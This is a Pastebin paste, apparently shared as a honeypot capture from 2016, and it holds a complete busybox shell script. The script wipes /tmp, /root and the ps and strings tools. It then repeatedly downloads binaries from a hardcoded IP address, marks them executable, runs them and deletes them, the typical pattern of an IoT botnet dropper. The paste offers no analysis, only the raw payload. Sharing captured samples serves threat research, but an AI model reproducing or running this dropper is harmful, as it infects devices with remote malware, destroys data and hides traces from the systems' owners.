Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-05-28 22:35

May 28th, 2016
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.18 KB | None | 0 0
  1. #!/bin/sh
  2. busybox rm -rf /tmp/*
  3. busybox rm -rf /root/*
  4. busybox rm -rf /usr/bin/strings
  5. busybox rm -rf /usr/bin/ps
  6. rm -f *
  7. busybox wget http://23.94.97.17/10; busybox chmod +x 10; ./10; busybox rm -f 10*
  8. rm -f *
  9. busybox wget http://23.94.97.17/11; busybox chmod +x 11; ./11; busybox rm -f 11*
  10. rm -f *
  11. busybox wget http://23.94.97.17/12; busybox chmod +x 12; ./12; busybox rm -f 12*
  12. rm -f *
  13. busybox wget http://23.94.97.17/13; busybox chmod +x 13; ./13; busybox rm -f 13*
  14. rm -f *
  15. busybox wget http://23.94.97.17/14; busybox chmod +x 14; ./14; busybox rm -f 14*
  16. rm -f *
  17. busybox wget http://23.94.97.17/15; busybox chmod +x 15; ./15; busybox rm -f 15*
  18. rm -f *
  19. busybox wget http://23.94.97.17/16; busybox chmod +x 16; ./16; busybox rm -f 16*
  20. rm -f *
  21. busybox wget http://23.94.97.17/17; busybox chmod +x 17; ./17; busybox rm -f 17*
  22. rm -f *
  23. busybox wget http://23.94.97.17/18; busybox chmod +x 18; ./18; busybox rm -f 18*
  24. rm -f *
  25. busybox wget http://23.94.97.17/19; busybox chmod +x 19; ./19; busybox rm -f 19*
  26. rm -f *
  27. busybox wget http://23.94.97.17/191; busybox chmod +x 191; ./191; busybox rm -f 191*
  28. rm -f *
  29. busybox wget http://23.94.97.17/192; busybox chmod +x 192; ./192; busybox rm -f 192*
  30. rm -f *
  31. sleep 1
  32. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement